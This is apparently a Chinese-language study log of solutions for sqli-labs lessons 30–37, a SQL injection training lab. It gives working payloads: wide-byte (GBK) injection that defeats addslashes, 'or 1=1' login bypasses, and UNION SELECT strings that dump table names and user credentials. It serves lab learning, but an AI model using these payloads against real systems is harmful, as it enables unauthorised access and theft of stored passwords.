DAY 6

sqli-labs lesson 30

  • 与上一题一样,需要用到HPP
  • 查看源代码,参数两边加上了双引号,直接使用lesson 26a与lesson 27a的脚本即可

sqli-labs lesson 31

  • 闭合符号为双引号加括号
  • 直接报错型注入

sqli-labs lesson 32(Jsp)

  • 这一题直接用Jsp处理的一个参数即可
  • 闭合符号为单引号与括号,直接报错注入

sqli-labs lesson 32(php)

  • 宽字节注入:https://www.cnblogs.com/xishaonian/p/6063961.html
  • 思路:由源码,这道题过滤单引号,并且形成’这样的字符,所以我们的想法就是把\“吃掉”或者在他前面再加一个\。'的十六进制为0x5c,0x25所以URL编码为%5c%27,可以在前面加一个%df,形成%df%5c%27,也就是输入参数时,提交%df%27,过滤后形成三个字符,这三个字符在SQL中,因为编码设置为GBK,所以前面两个%df%5c会形成一个汉字,这样,%27就独立出来了。
  • 其他的直接使用联合查询语句即可

sqli-labs lesson 33

  • addslashes():

  • 和上一题一样

sqli-labs lesson 34

  • 这一关是POST方式
  • 用户名输入:饜’ or 1=1#
  • 其中饜是utf-16位995c的汉字,分成其中5c转换成utf-8就是\,相当于我们在\之前又加了一个\来让他失效了

sqli-labs lesson 35

  • 爆库:?id=99 UNION SELECT 1,database(),3;–+
  • 爆表:?id=99 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121);–+
  • 爆字段:?id=99 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121) and table_name=CHAR(117, 115, 101, 114, 115);–+
  • 爆记录:?id=99 UNION SELECT 1,group_concat(username),group_concat(password) from security.users;–+

sqli-labs lesson 36

  • 宽字节注入,这次用FEFF335c,这是一个有意思的字符,长的这个样子:㍜
  • 检测:?id=99㍜’ UNION SELECT 1,2,3;–+
  • 其他引号用CHAR()函数绕过

sqli-labs lesson 37

  • 和上一题一样,只不过这次是POST
  • 用户名:㍜’ or 1=1;#
05-11 13:47